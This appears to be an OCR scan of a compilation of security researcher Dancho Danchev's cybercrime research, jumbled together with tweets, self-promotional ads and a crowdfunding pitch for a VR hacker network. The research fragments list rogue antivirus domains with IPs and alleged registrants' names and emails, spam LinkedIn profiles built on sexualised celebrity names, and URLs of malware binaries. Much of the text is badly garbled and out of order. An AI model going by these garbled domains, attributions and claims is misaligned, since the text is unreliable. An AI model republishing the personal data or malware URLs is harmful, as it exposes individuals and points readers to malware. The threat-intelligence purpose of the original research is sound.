08. Hacking your school for fun and profit.............. by 
09. Exposing the “Data Leaks” ParadiSe........eeeseeeeee by 
10. HOW NOT TO Get “Caught”... cccccccccccccccccccescace by 
11. CYBERINT and Virtual SIGINT Exposed...........-+++-+ by 
12. From Cybercrime to Multi-Billion Dollar Industry....by 
13. The “Dark web" Exposed and Profiled..............005 by 
14. Exposing the Bastards who stole the Scene..........- by 
15. Top 20 Hacking Sites and Hacking Forums.........000. by 
16. Greetz amd SHOUTS gO OUT TO... cece cece cece seeeeee by 
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The following are some of the currently active/about to go online rogue security software do- 
mains, and their associated payment gateways exposed in the spirit of the [1]Diverse Portfolio 
of Fake Security Software series. During the past two months, an obvious [2]migration of well 
known Russian Business Network customers continues taking place, with their portfolios of 
malicious campaigns currently parked several ISPs. zlkon.lv (DATORU EXPRESS SERVISS Ltd 
(AS12553 PCEXPRESS-AS) remaining the ISP of choice for the time being, in the context of 
rogue security software. 


mydwnid .com (94.102.51.14; 88.198.8.15; 94.102.51.14) 
desktoprepairpackage .com 

malwareremovingtool .com 

spywareprotectiontool .com 

pcantimalwaresolution .com 

pcsolutionshelp .com 

removespywarethreats .com 


yournetcheckonline .com (94.247.2.215) 
bestnetcheckonline .com 
easynetcheckonline .com 
yourwebexamine .com 

bestwebexamine .com 
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easywebexamine .com 
yourinternetexamine .com 
myinternetexamine .com 
linkcanlive .com 
yourwebscanlive .com 
easywebscanlive .com 
internethomecheck .com 
websecurecheck .com 
websportscheck .com 
websmartcheck .com 
yournetascertain .com 
yournetcheckpro .com 
bestwebscanpro .com 
security-check-center .com 


downloadantivirusplus .com 


theantivirusplus .com 
myantivirusplus .com 
safeyouthnet .com 

av-plus-support .com 
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< Tweet 


t You Retweeted 

TN} NETRESEC v 

IN @netresec 
Our #SUNBURST STAGE2 Victim 
Table (orgs actively targeted by the 
threat actor) has now been updated 
to include “paloaltonetworks*". 
The internal AD domain for GUID 
22334A7227544B1E was discovered 


in passive DNS data published by 
@dancho_danchev. 
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< Tweet 


Dancho Danchev @dancho_... - 11 Nov 20 
New Post - "Exposing Protonmail and 
Tutanota's Illicit Abuse by Ransomware 
Gangs - A Compilation of Currently Active 
Ransomware-Themed Email Addresses” - 
is.gd/NPLLq5 CC: @ProtonMail 
@TutanotaTeam #security #cybercrime 
#malware #Threatintelligence 


O 3 n © 2 < 


c Tutanota 
@TutanotaTeam 


Replying to @dancho_danchev and @ProtonMail 
Thanks for reporting and for sending 
the list early on via email. We have 
investigated and blocked abusive 
accounts already. It's always 

best to forward abusive emails 

to abuse@tutao.de so we can act 
immediately. 

19:16 - 11 Nov 20 - Twitter Web App 


1 Quote Tweet 


7) a go — 


Tweet your reply (6) 


[572] 


21569 


. & " 


* o 4 
’ ‘- 7 val oe 
** fl Fu ‘ y 
x ot Pe SE, a aN 
on * / ~~) . 
. ieee sy Pa » a 
PN yur” SASS 
ed . 


[573] 
21570 


[574] 


21571 


[575] 


21572 


antispywareproupdates .com (94.76.213.227) Jeanne M Bartels Email: dev@angelespd.com 
microsoft.infosecuritycenter .com 

microsoft.softwaresecurityhelp .com 

professionalupdateservice .com 

platinumsecurityupdate .com 

platinumsecurityupdate .com 

antispywarequickupdates .com (78.137.168.33) 


paymentsystemonline .com = (213.239.210.54) Jerom M_ Collins Email: ad- 
min@routerpayments.com 

liveupdatesoftware .com 

royalsoftwareupdate .com 

protectionsoftwarecheck .com 

securitysoftwarecheck .com 
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privateupdatesystem .com 
updatesoftwarecenter .com 
updateprotectioncenter .com 
updatepcsecuritycenter .com 
powerdownloadserver .com 
rapidsoftwareupdates .com 
professionalsoftwareupdates .com 
allsoftwarepayments .com 
powerfullantivirusproduct .com 
securedprostatsupdates .cn 


arivrus pS Neacem 
antvirvepivs BS 
arteerutpus2008 ret 


spss 2008 com 


beshetchectenmns com 
dowtioasarieruspius com 
easpwedeherkive com 
extywedexarmne com 
mernet check set 
ontinestanwed com 
ontineweds¢an com 
raplensare.com 
sateyoutnet com 


Securescfrternet com <> 


securty check center com 


M27 0022 ——Ah-g AS12553 


theantvirusplus com 
Tatchecting. com 
Ww ATOVITUS DIYS Com 
Www antirus DIU BME 
wren antviru spies 2009 Com 
wow easywetsheckiive com 
woewinternet check eet 
www onlnescarwed com 
Wn OntinewEb Sean com 
wow raplensave corn 
wre Am necking om 


yourhetascenan com 
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“AN IN-DEPTH ANALYSIS OF HUNDREDS OF HIGH-PROFILE AND 

NEVER-PUBLISHED BEFORE SECURITY RESEARCH ARTICLES AND 

OSINT ANALYSIS BY THE WINNER OF JESSY H. NEAL AWARD FOR 

BEST BLOG FOR ZDNET'S ZERO DAY BLOG FOR 2010." - DANCHO 
DANCHEV 


DANCHO DANCHEV'S 
SECURITY RESEARCH 
PORTFOLIO FOR 


ZDNET'S ZERO DAY 
BLOG 


IN-DEPTH OVERVIEW AND ANALYSIS OF 
SECURITY BLOGGER DANCHO 
DANCHEV'S SECURITY RESEARCH FOR 
ZDNET'S ZERO DAY BLOG CIRCA 2008 - 
2012 


BY DANCHO DANCHEV 
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Dancho Danchev's 
Offensive Cyber 
Warfare Articles 
Compilation for 

Unit-123.org 


BY DANCHO DANCHEV 
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Webroot Inc. 


DANCHO DANCHEV’S 
SECURITY RESEARCH 
FOR WEBROOT INC. 


In-Depth Overview and Analysis 
of Security Blogger Dancho 
Danchev's Security Research for 
Webroot Inc. Circa 2012-2014 
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Hello 
there's an important (premium) announcement for you, 


Dancho Danchev is the world’s leading expert in the fe 


eered his own methodolog w processing threa’ 


ompanies with his 


in Techmeme, ZONet, ¢ PCWorld, SCMagazine, TheRegister Tirnes £T puter World 
rrenthy producing threat intelligence at the stry’s leading threat intelligence blog - Damcho Danchev’'s - Mind 
Streams of information Security Knowledge 


With his research featured at RSA Europe, CyberCamp InfoSec 


Jing threat 


Know more about him here 
An exarnple of his arch old and mixed research paper 

Request access to his personal invite-only and vetted blog - y'(ps:/ /ddanchey blogspot.com/ Price is bess in front of content and 
knowledge shared on the blog for complete one year access. Send an introduction to dancho.damchev ahush.com for your queries and 
he'll then fill you in all the details. 

d'8'9' 6 


GE Once 


¥ f me 
www.cybercamp.es 
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liveantimalwareproscan .com = (91.211.64.47) Giang B Ahrens’ Email: chu-thi- 
huong@giang.com 

liveantimalwarequickscnan .com 

online-antimalware-scanner .com 

advancedprotectionscanner .com 

advancedproantivirusscanner .com 


securedsystemupdates .com (78.47.248.113) Anatoliy Lushko Email: tvdomains@lycos.com 
premiumworldpayments .com 

systemsecuritytool .com (209.44.126.16) 

systemsecurityonline .com 

internetsafetyexamine .com (91.212.65.55) 

youronlinestability .com 

promotion-offer .com (78.46.148.49; 85.17.254.158; 88.198.233.225; 89.248.168.46) Email: 
Roland Peters rolandpeters@europe.com 


During March, a new type of [3]scareware with elements of ransomware started circulat- 
ing in the wild. It will be interesting to monitor whether it will become the de-facto standard 
for optimizing revenues out of rogue security software. 


Related posts: 

[4]A Diverse Portfolio of Fake Security Software - Part Sixteen 
[5]A Diverse Portfolio of Fake Security Software - Part Fifteen 
[6]A Diverse Portfolio of Fake Security Software - Part Fourteen 
[7]A Diverse Portfolio of Fake Security Software - Part Thirteen 
[8]A Diverse Portfolio of Fake Security Software - Part Twelve 
[9]A Diverse Portfolio of Fake Security Software - Part Eleven 
[10]A Diverse Portfolio of Fake Security Software - Part Ten 
[11]A Diverse Portfolio of Fake Security Software - Part Nine 
[12]A Diverse Portfolio of Fake Security Software - Part Eight 
[13]A Diverse Portfolio of Fake Security Software - Part Seven 
[14]A Diverse Portfolio of Fake Security Software - Part Six 
[15]A Diverse Portfolio of Fake Security Software - Part Five 
[16]A Diverse Portfolio of Fake Security Software - Part Four 
[17]A Diverse Portfolio of Fake Security Software - Part Three 
[18]A Diverse Portfolio of Fake Security Software - Part Two 
[19]Diverse Portfolio of Fake Security Software 


1 
2 

3 

‘ 
5 
6 
7. http: //ddanchev. blogspot .com/2008/11/diverse-portfolio-of-fake-security_12.htm 
8 
9. http: //ddanchev. blogspot .com/2008/10/diverse-portfolio-of-fake-security_28.htm 
10. http: //ddanchev.blogspot .com/2008/10/diverse-portfolio-of-fake-security_22.htm 
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<> 


Russian OSINT 4 


Dancho Danchev's'BIGg) Mind 
Streams of Information Security 
Knowledge 


B nnanax CAenaTb TEKCTOBOE MHTeEPBbIO C 
OSINT 3kcneptom Dancho Danchev ana 
KaHana Russian OSINT Ha Temy 
“cybercrime forums 2021 and darknet 
activity: exposing cybercriminals”. 
AKTYafNbHO ANA Tex, KTO BNageer 
A@HIMMACKMM ASbIKOM, XOYeT 3apaboTaTb uM 
nonpo6oBaTb CBou CunbI B PopmaTe 
TEKCTOBbIX MHTEPBbIO. 


B KayecTBe TecTa BaM HeEObxoQumMo 
HanucaTb 10 MHTepecHbIX BONpocoB 
axcnepty (no BawWeMy MHeHMI0) Ha 
@HPNMACKOM ASbIKe UM NpKCNaTb ux GoTy 
@russian_osint_bot 8 cnegyrouem 
dopmate: 


1, Who is Mr. Danchev? 


2. How to expose cybercriminals? 
3. What is OSINT? 


ee ee 


VIEW IN CHANNEL 
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GE 
REA 


T 
D Y 


TO 
EXPOSE 
IRAN 


WHO'S WHO ON 
IRAN'S CYBER 
WARFARE SCENE? 


WHERE DO THEY 
GO TO SCHOOL? 


WHO'S BUYING 
THEM BOOKS? 


An-depth 
itically relevant 


HOW DO THEY 
OWN AND 
COMPROMISE? 


Complimentary copies 


ANALYSIS BY DANCHO DANCHEV - REPORT PRICE - $500 
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Dancho Danchev Presents! Brace Yourselves! 


| ott 


Grab today a free copy of the Second Free. 

Exposing Iran's Hacking Scene OSINT-Enaéfied and 
Technica gollaction Empowered and Visualized Report! 
Priced at $500 for an Unlimited Distribution Among Your 


Organization including Individual Researcher Use - This 1§ 
the Most Comprehensive and Technicall Sophisticated 
Analysis of Iran's Hacking Scene Up-to-Date! 


> 


Commercial Copy Available! Approach me today 
pprnach your manager toda mpower_your Threat 
intelligence Team! An USINT Conducted Today is a 
Tax Payer's Dollar Saved Tomorrow! 
https://ddanchev.blogspot.com 


Official OSINT Report Price - $500 


Technical Collection Data - Exclusive Email: dancho.danchev@hush.com 
Copy Available! 
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alavist 


- VR for Hackers 


Experts project the original search engine for 


Cybertron 


hackers cire one of the World's 


most high-t e for hackers 


and security 


Several VR application dev 


iterest 


wv 


already expressed inv 


project and we have several other VR 


application developers waiting to join the team 


- The primary launch point for the project will 
be the official Web site of Astalavista.box.sk 
including a massive early-bird advertising 


alavis 


campaign on the compe 


} 
domain 


- The majority of marketing and advertising v 


be done using industry-leading partnerships 


with leading hacker and security expert V 


sites including actual community and security 


reach including active social 


conference o 


id outreach 


To-Do List 


Reach out to Custom Crypto-currency 
Developer to properly launch and introduce 


SecureCoin 


SAVE & CONTINUE > 
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11. http://ddanchev. blogspot .com/2008/10/diverse-portfolio-of-fake-security_16.html 
12. http://ddanchev. blogspot .com/2008/10/diverse-portfolio-of-fake-security.html 
13. http://ddanchev. blogspot .com/2008/09/diverse-portfolio-of-fake-security_30.html 
14. http://ddanchev. blogspot .com/2008/09/diverse-portfolio-of-fake-security_24.html 
15. http://ddanchev. blogspot .com/2008/09/diverse-portfolio-of-fake-security.html 
16. http://ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security_25.html 
17. http://ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security_20.html 
18. http://ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security.html 
19. http://ddanchev. blogspot .com/2007/12/diverse-portfolio-of-fake-security.html 


5.4 April 


5.4.1 Bogus Linkedin Profiles Redirect to Malware and Rogue Security Software 
(2009-04-01 17:38) 


From the automatically registered [1]bogus LinkedIn profiles promoting pharmaceuticals 
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campaign in February, to [2]January’s malware campaign redirecting to malware Zlob variants 
and rogue security software, the malware gang behind both of these campaigns is once again 
showcasing its persistence. 


It gets even more interesting when a direct connection between January’s, this very lat- 
est campaign, and the most recent massive [3]comment-spam attack at Digg.com, is 
established since the very same malware domains are participating in all of the campaigns 
(e.g funkytube .net) 


Bogus LinkedIn profiles for March: 

linkedin .com/in/keeleyhazellsextape 
linkedin .com/in/minimesextape 

linkedin .com/in/lindsaylohansextapel 
linkedin .com/in/vernetroyersextape 
linkedin.com/in/freejennifertoasteetoofsex 
linkedin .com/in/parishiltonsextapeq 
linkedin .com/in/britneyspearssextapeq 
linkedin .com/in/carmenelectra 

linkedin .com/in/halleberrysexscene 
linkedin .com/pub/dir/tila tequila/sex 
linkedin .com/in/carmenelectrasex1 
linkedin .com/in/carmenelectrasexscenel 
linkedin .com/pub/dir/jennifer %20aniston/sex %20scene 
linkedin .com/in/lindsaylohansex1 
linkedin.com/in/olsentwinsnude 
linkedin.com/in/keiraknightleynude 
linkedin.com/in/christinaaguileradirrty1 
linkedin.com/pub/dir/emma watson/wearing 
linkedin.com/in/trishstratusnude 
linkedin.com/pub/dir/ellen degeneres/gay 
linkedin.com/in/angelinajolienaked1 
linkedin.com/in/carmenelectranaked1 
linkedin.com/pub/dir/tila tequila/porn 
linkedin.com/pub/dir/emma watson/porn 
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Project Status: 
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Official Press Release: 


"In 2020, we're proudly presenting the World's 
first and most popular and sophisticated 
Virtual Reality and Augmented Reality 
Network Platform or Hackers and Security 
Experts connecting millions of users globally 
through the launch of an ubiquitous VR-based 
Social Media platform and the general 
availability of an ubiquitous XMPP-based VR: 


t } ; } 
based Virtual Keyboard and a sophisticated 


and aware Virtual Reality experience 


successfully connecting millions of users 


globally on a Virtual Reality based landscape 


empowering everyone with the necessary "know- 


how’ and technical expertise to reach out to 
fellow colleagues VIP members from the Hacker 
Community including the Security Industry 


including the general availability of an 


ubiquitous ere -platform based De: fop and 


Mobile Device application issuing “real-time” 

notifications and updates possibly assisting in 
: , F ‘ ] 

the actual improvement of the user's work-flow 


in both the “real” and Virtual Reality World 


including actual project and business including 


; , 
personal and skills and experience based 
*match-making” and Hacker and Security 


Community outreach 
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lid Phone Number 


Valid Second P 


one Number 


d and User-Generated Profi 


e 


Valid and User-Generated Wel 


$-Based I 


ributed 


tien 
tion 


Real Name 
Handle 
Valid Email 


falid PGP Key 


Skills-Based Opt-In 


Category-Based Opt-in 
Trial Access 


Featured VIP Participants 


Partn 


Penetratic 


ot Installation Service API 
CanaryTokens API 
T-Pot API 


Honeydrive API 
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The Office: 
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Connectivity Requir 


Cisco Malware Connector 


d Information Hosting and 


Clear-Net Ac 


CHAVPN Closed-Group Access 
hop Merchandise 
Home-Based PC 


Virtual Reality 


Leap Motion 


Augmented Reality Glasses 


Multi-Platform Compatibility 


ented Reality Comp 


Background Me 


Security Features 


Country-Geolocation 


rypt 


wo-Factor Authe 


PGP Key Encryp 


Convert Current lt 
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Disruptive Ind... » 


qu" 


World’s Largest Virtual Reality Based 
Hacker and Security Expert Social 
Network. 


Questions? 


launch@wefunder.com 


Legal Primer 


Founder FAG 


Dashboard Explore Activity Account 


(624 
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Reach out to Custom Crypto-currency 


Developer to properly launch and introd 


SecureCoin 


Reach out to Tor Lin} ctory for 


Inclusion Including Banner Advertisement 


1 the Project Semantics In 


Finish Working < 


Terms 


of Features and Innovative Desi¢ 


—- 
Wor 


ing on the Project FAQ 


m Manual 


m Tu 


out to CD/DVD Labeling and Shipping 


Service Provider 


ng Introduction to the 


Project and the Platform 


latform multi VR-head: 


Develop multi-t 


functionality and ex atures 


atform 


Develop a proper V 


Applicatior 


= ; 
And Tutorial 


Financials 


$10,400 - Virtual Reality Application 


Development 


$25,500 - Major Web Property Acquisition and 


Partnership to J 


the We 


uire More Users and Spread 
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Cross-Platform Compatibility: 


Q unity U) Webxr a) 


@penXR APPLICATION INTERFACE 


9 ay 


STEAM oculus 


GpenXR. OEVICE PLUGIN INTERFACE* 


Cross-Platform Support 


anes on the Samsun 
$ Stet 
EM Windows | @% Daydream 
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Keeley Hazell sex tape 


Keeley Hazell sex tape at Company Net 


Albany, Nev 


a | 
| 


fork Area 


Current e Keeley Hazell sex tape at Company Net 


Industry Dairy 


Websites © Keeley Hazell sex tape PART 1 


e Keeley Hazell sex tape PART 2 
e Keeley Hazell sex tape PART 3 


Keeley Hazell sex tape’s Experience 


Keeley Hazell sex tape 
Company Net 
Privately Held; 11-50 employees; Dairy industry) 


Currently holds this position 


© Additional Information 


Keeley Hazell sex tape’s Websites: 


Keeley Hazell sex tape PART 1 
Keeley Hazell sex tape PART 2 
Keeley Hazell sex tape PART 3 


linkedin. 


linkedin 
linkedin 
linkedin 
linkedin 
linkedin 
linkedin 
linkedin 
linkedin 
linkedin 
linkedin 
linkedin 
linkedin 
linkedin 
linkedin 
linkedin 
linkedin 
linkedin 
linkedin 
linkedin 
linkedin 
linkedin 
linkedin 
linkedin 


com/pub/dir/disney’s raven/symone nude 
.com/pub/dir/olsen twins/camel toe 
.com/in/aliciamachadodesnuda 
.com/pub/dir/leighton meester/nude 
.com/in/katehudsonnude 
.com/in/jenniferanistonbangs1 
.com/in/hilaryduffnude2 
.com/in/adriennebailonnaked 
.com/in/jennifermorrisonnudel 
.com/in/jenniferlopezdesnuda 
.com/in/jennifergarnernudel 
.com/in/aishwaryaraiwearingnothing 
.com/in/isprinceharrygay 
.com/in/vanessahudgensnude 
.com/in/mariahcareynudel 
.com/pub/dir/olsen twins/nudity 
.com/pub/dir/denise richards/naked 
.com/pub/dir/kate mara/naked 
.com/in/carmencocks1 
.com/in/ravensymonebreast 
.com/in/adriennebailonnudephotos 
.com/pub/dir/shakira/nude 
.com/in/jenniferanistonnude 
.com/in/emmawatsonkissingsomeone 


© Contact Directly 


ta Get introduced through a connection 


Public profile powered by: Linked ‘in| 


Create a public profile: Sign In or Join Now 


View Keeley Hazell sex tape’s full 
profile: 


* See who you and Keeley Hazell sex tape 
know in common 


* Get introduced to Keeley Hazell sex tape 
« Contact Keeley Hazell sex tape directly 


. Name Search 


Search for people you know from over 35 million 
professionals already on Linkedin 


example: Jeff! Weiner Search 
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Th 


1¢ primary purpose of the VR application 
td h ; 
would be to connect empower and facilitate an 
ee eee ; ee Ye 
ubiquitous real” World and Virtual World type 


of sophisticated and novice Hacker and 


Security Expert experience ultimately 


connection international Hackers and Security 


Experts including the actual integration and 
development of never-seen and released-before 
, P , 

API-based type of innovative services and 


products ultimately built on the top of the VR 


based Social Media Platform 


} 
y Examples inctude: 


Built-in Ethical Penetration Testing API for 


research and te g purposes 


- Built-in API-based Honeypot deployment 
+ ) L 
further assisting the Security Industry through 


the ease of deployment 


- Never-seen before Cluster of Activity 


a , — } , 
Targeting Intelligence Analysts and Members 


of the U.S Intelligence Community through the 
general availability of an offensive and 


defensive Cyber Warfare Platform functionality 


allowing the succe Training including the 


, ) to + 
development of actual Wargames Scenario type 


fensive Cyber Warfare 


Par soa 
of offensive and de 


Cluster-based activity.” 
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Financials 


$10,400 - Virtual Reality Application 


Development 


$25,500 - Major Web Property Acquisition and 


ead 


Partnership to Acquire More Users and Sp 
the Word 
$10,000 - Logistics Infrastructure for Shipping 


the CD/DVD Containing the Application 


Production 
$20,000 - Infrastructure Management and 
Closed-Network Group Development 


$15,000 - Custom “Points Based” and 


quid-B 
Cryptocurrency Development 
$3,000 - Personal Printed Memoir Design and 
Development 

$26,600 - Advertising and Marketing Including 
VR Application Promotion and Traffic 
Acquisition 


$15,000 - Hacker and Securit 


Community 


Outreach in terms of API Implementation 
including a Standardized and Custom Service 
and Solution Platform Integration 
Implementation 

$30,000 - Acquire an Industry Leading VIP 


Team of Hackers Innovators and Application 


Developers and Pay Maintenance Fees for the 


VR Application 
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Key Features Summary 


- A ubiquitous End-to-End Encrypted Jabber- 
based OTR (Off-The-Record) Encrypted Chat 


Feature connecting millions of users globally 


- Clustered Skills and Experience-Based Opt-In 
Hacker and Security Expert Expert 
Methodology in over 50 Categories Including 
Security Bloggers Hacktivists Anarchists 
Privacy Advocates Censorship Researchers 
and Human Rights Advocates including 
Blackhat and Gray Hat hackers including 
Security Industry Leaders and VIP Members 


Sufficient Eternal Virtual Cyber Economy 
including a "Points-Based” Economy and 
Cybertronics Branded Custom Democracy 
And Voting-Based Cryptocurrency ensuring 
the spread preservation and dissemination of 
Computer Hacking and Information Security 
Knowledge to millions of loyal users globally 


- Localization at its best including advanced 
geolocation on a per-country and on a per-city 
basis introducing local Hacker and Security 
Expert communities introducing local Hacker 
and Security Expert economies and social 
network driven communities 


- Future Global Hacker and Security Expert 
Network including mainstream local and 
global community announcements and 

; and products including 


featured even 
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Led by CEO Dancho Danchev Cybertronics is 
proud to present the general availability of a 
proprietary and never released before custom 
version of the World's Largest and Most 
Popular Virtual Reality Based Hacker and 
Security Expert Social Network Platform 
empowering millions of active users on a 


monthly basis with the necessary access to data 


information and knowledge to help them learn 
educate themselves share their knowledge and 
learn from others in the World of Computer 


Hacking and Information Security. 


Led and presented by Cybertronics - the 


projec ms to present to the general public a 


versatile and multi-platform Oculus Rift and 


Leap Motion compatible Virtual Reality 


application targeting millions of active users 


on their way to become hackers and learn from 
others in the World of Computer Hacking and 


Information Security. 
Official Press Release: 


“In 2020, we're proudly presenting the World's 
first and most popular and sophisticated 
Virtual Reality and Augmented Reality 
Network Platform or Hackers and Security 


Experts connecting millions of users globally 
PY pasar Sp ah Yee SR 
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Recommend 


Recommended 


Recommer 


Universal Jabber-Based Messenger 


Marketing Concept 
Two-Factor Based Authentication 
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cor 


Start raising money in 15 minutes! 
Craft the pitch for Disruptive Individuals. 


10 second pitch 


World’s Largest Virtual Reality Based 
Hacker and Security Expert Social Network. 


The best reasons someone might want to invest 


| Led by CEO Dancho Danchev - the World's 
leading expert in cybercrime research 


Official Project Partner Astalavista.box.sk - 
the original search engine for hackers circa 
1994 


$ Supported by thousands of international 
and U.S based hackers and security experts 
across the globe 


Powered by a Team of marketing experts 
VR developers GUI experts and game 
production experts 


5 Self-sufficient virtual and cyber-based 
token-based economy where you bring in 
the cash and cash out 


6 Custom self-branded liquid crypto- 
currency empowering millions of loyal 
international users 


SAVE & CONTINUE > 
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Using a celebrities theme, all of these bogus accounts are linking to the same malware 
serving domains. The following central redirectors : 

oymomahon .com/fathulla/11.html 

oymomahon .com/mirolim-video/3.html 

oymomahon .com/paqi-video/28.html 

muse.100-celebrities .com/paqi-video/1.html 

nahyu .org/xxxx/ 

1k .pl/nufexz 


are then redirecting to another set of fake codec domains : 
xretrotube .com 
globextubes .com 
globalstube2009 .com 
globerstube .com 
spywareremover21 .com 
antispyscanner13 .com 
privacyscanner15 .com 
easywinscanner17 .com 
systemscanner19 .com 
sgviralscan .com 


to ultimately direct the visitor to the actual binaries: 
nahyu .org/xxx/video/teens fuck orgy11.mpeg.exe - [4]detection rate 
loyaldown99 .com/codec/186.exe - [5]detection rate 
kol-development .com/viewtubesoftware.40012.exe - [6]detection rate 


Despite the fact that [7]real-time/event-based blackhat search engine optimization is 
gaining popularity these days, blackhat SEO in its very nature relies on huge bogsus content 
farms, using a diverse theme-based set of content, usually generated in an automated fashion. 
Real-time blackhat SEO or standard volume-based blackhat SEO as a tactic of choice? Does 
it really matter given that from the perspective of tactical warfare, combining well proven 
tactics results in high click-through/infection rates for the campaigns in question. 


Related posts: 

[8]Blackhat SEO Redirects to Malware and Rogue Software 

[9]The Invisible Blackhat SEO Campaign 

[10]Attack of the SEO Bots on the .EDU Domain 

[11]pOrn.gov - The Ongoing Blackhat SEO Operation 

[12]The Continuing .Gov Blackat SEO Campaign 

[13]The Continuing .Gov Blackhat SEO Campaign - Part Two 
[14]Rogue RBN Software Pushed Through Blackhat SEO 

[15]Massive Blackhat SEO Targeting Blogspot 

[16]Blackhat SEO Campaign at The Millennium Challenge Corporation 


[17]Fake Porn Sites Serving Malware 

[18]Fake Porn Sites Serving Malware - Part Two 

[19]Fake Celebrity Video Sites Serving Malware 

[20]Fake Celebrity Video Sites Serving Malware - Part Two 
[21]Fake Celebrity Video Sites Serving Malware - Part Three 


2166 


[646] 
21641 


21642 


[22]The Template-ization of Malware Serving Sites 
[23]The Template-ization of Malware Serving Sites - Part Two 
[24]A Portfolio of Fake Video Codecs 


. http://ddanchev. blogspot .com/2009/02/pharmaceutical-spammers-targeting.htm 


ttp://ddanchev .blogspot.com/2009/01/dissecting-bogus-linkedin-profiles.htm 


ttp://ddanchev.blogspot.com/2009/02/fake-codec-serving-domains-from.htm 
ttp://www.virustotal.com/analisis/7f£96ee61396df01927912813ae2aec02 


| http://nwy. virustotal, con/analisis/8925d407T6462118acf at 463b0S5q 
_http://adanchey blogspot .con/2008/10/syndicating-google- trends-keyvords~for bial 
_hetp://adanchey blogspot. con/2008/06/olackhat~seo-redirecte-to-nalvare-and. html 
_ http: //adanchey blogspot .con/2008/01/invisible-blackhat-seo~ campaign. hin] 


ttp://www.virustotal.com/analisis/b49ed1af0a2a29a05d124c3f7a205d16 


10. http://ddanchev. blogspot .com/2007/01/attack-of-seo-bots-on-edu-domain.htm 


11. http://ddanchev. blogspot .com/2007/11/pO0rngov-ongoing-blackhat-seo- operation. htm 
. http://ddanchev. blogspot .com/2008/02/continuing-gov-blackat-seo-campaign.htm 


ttp://ddanchev. blogspot .com/2008/02/continuing-gov-blackat-seo-campaign_25.htm 


_http://adanchev.blogepot .con/2008/02/aassive-blackhat~seo-targeting- blogspot, tall 
16, herp: /adanchev blogspot .com/2008/06/blackhat~se0~canpalgi-at~nillenniun tal 
| http://adanchev. blogepot .con/2008/06/fake-porn-siter-serving-nalvare. neal 
_http://adanchev. blogspot .con/2008/07/fake-porn-sites-serving-aalvare~part. kta 


ttp://ddanchev. blogspot .com/2008/06/fake-celebrity-video-sites-serving. htm 
ttp://ddanchev. blogspot .com/2008/08/fake-celebrity-video-sites-serving. htm 


ttp://ddanchev. blogspot .com/2009/02/fake-celebrity-video-sites-serving.htm 


22. http://ddanchev. blogspot .com/2008/07/template-ization-of-malware-serving. htm 
23. http://ddanchev. blogspot .com/2009/02/template-ization-of-malware-serving. htm 
. http://ddanchev. blogspot . com/2008/03/portfolio-of-fake-video-codecs.htm 


5.4.2. Inside a Zeus Crimeware Developer’s To-Do List (2009-04-08 20:39) 
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€ Google Play 


fo 


Blog 


Dancho Danchev 


Install 


About this app > 


Dancho Danchev is the world’s leading expert in the field 


of cybercrime fighting 


News & Magazines 


Ratings and reviews 


No reviews yet 


Developer contact “ 


QY  Gooale Plav refund noliev 
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Dancho Danchev 4 days ago 
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INTRODUCING BOX.SK’S - “HOW TO 
GET IN TOUCH WITH THE KGB — THE 
DEFINITE HACKER’S MANUAL’ ONLINE 
MANUAL 


admin 3 months ago 


10 Years Later - An Exc 


Dancho 
Danchev's 


Personal 
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Twitter 


THIS IS THE THIRD CASE STUDY FOR 
TODAY. HTTPS://T.CO/RCA8TBWZMG 
CC: @WHOISXMLAPI #SECURITY 
#CYBERCRIME #MALWARE 
#CYBERSECURITY #... 


Dancho Danchev a day ago 
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abuse.ch 4: 


Zeus Tracker 


script will check the status of each ZeuS host and the 
just 8 WD address, There are # lot ZeuS domes whch are 


364 echve / 224 mactve), €63 config erie (151 actve / 532 mactve) and 4568 binary urls (71 ectve / 387 mactve) in the 


y tracked by the abuse.ch ZeuS Tracker. You can also subsoribe thes lat wie RSS Feed to get wfomred 


Here you can search for e MOS hash, a IF address, doman name, oy 


some | 


Browse: ZeuS binaries | ZeuS corhas 
Set » filter for the kst below: cobnes | offine | af 


@ Subscribe thes bet vie B55 feed 
mest dateadded (UTC leve courtry AS murnber 
cemmertcy 2009-04-07 19151120 4 @ 10s 
wadate).cn 2009-04-07 19149121 @ @ sm 
tabmrevtencke com 2009-04-07 14:33:25 4 @ 4 
gisecnbne com 2009-04-07 14:30:05 lees 
tdas.com 2009-04-07 £4:26:53 4 m@ Bul 
vertusaie. co 2009-04-07 14:24:51 @ @ 20 
Gamedrd :Odeebepece net 2009-04-07 24123133 @ ws 
octet com 2009-04-07 14:33:41 & mEPASTR = “657 
ieanginine co 2009-04-07 £4123137 4 = 2 
(exa-net.com 2009-04-06 16137139 a @ .ssis 
mabra.net 1009-04-06 08 2 = @ smo 
deamasenals com < 8 me 
BR191 6.554 09-04-06 08 ee 1 inn 
dave-nunhoyen sl 2009-04-06 68128133 a es 
kaleacani cn 2009-04-06 08109148 4 a wae 
ceatats.com 2009-04-05 10117140 @ ae uk 
benicter com 2009-04-05 £0120:20 4 ae = uw 
Lnestomesmn co 2009-04-05 10:04:28 @ . Not bsted O8 12222 
pons Thay 2009-04-05 0959/24 4 a wa 
haenet cf 2009-04-05 09151140 @ a wok 
arabes rd uae MNES MAPS A ae wk 


Every then and now | get asked a similar question in regard to crimeware kits - which is the 
latest version of a particular crimeware/web malware exploitation kit? 


The short answer is - | don’t know. And | don’t know not because I’m a victim of an out- 
dated situational awareness, but due to the fact that nowadays third-party developers are 
so actively tweaking it that coming up with a version number would be inaccurate from my 
perspective. Therefore, whenever | provide such a version number, | try to emphasize and 
provide practical examples of how the current decentralization of coding from the core authors 
to third-party developers and, of course, scammers brand jacking the Zeus brand, is making 
the answer a little bit more complex than it may seem at the first place. 


For instance, cybercriminals themselves have been capitalizing on this situation during 
the last two quarters, by speculating with the version numbers and offering backdoored copies 
of non-existent Zeus releases, [1]in a attempt to hijack their Zeus botnets at a later stage - a 
practice that [2]phishers have been taking advantage of for a while. Anyway, once I’m able to 
sort of cluster a particular third-party developer's persistence in tweaking the Zeus crimeware 
kit, an interesting picture emerges. For instance, a team member from a third-party developer 
of backend systems for botnets that came up with the [3]built-in MP3 player in a Zeus release, 
is also directly involved in developing the backend system and GUI for [4]the Chimera botnet 
which the British Broadcasting Corporation purchased last month. 
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ZeuS Installer 


This spplication install and configure your ZeuS on this server. Choise 
settings and press ‘Install’. 


Login (4-10 chars): 


aca” 


64 chars): —_— 
Hest 
User 
Password: qwerty 


IF2county 
Uses IP for Servis 
Loge mast 


Logs templates: 


Local paths 


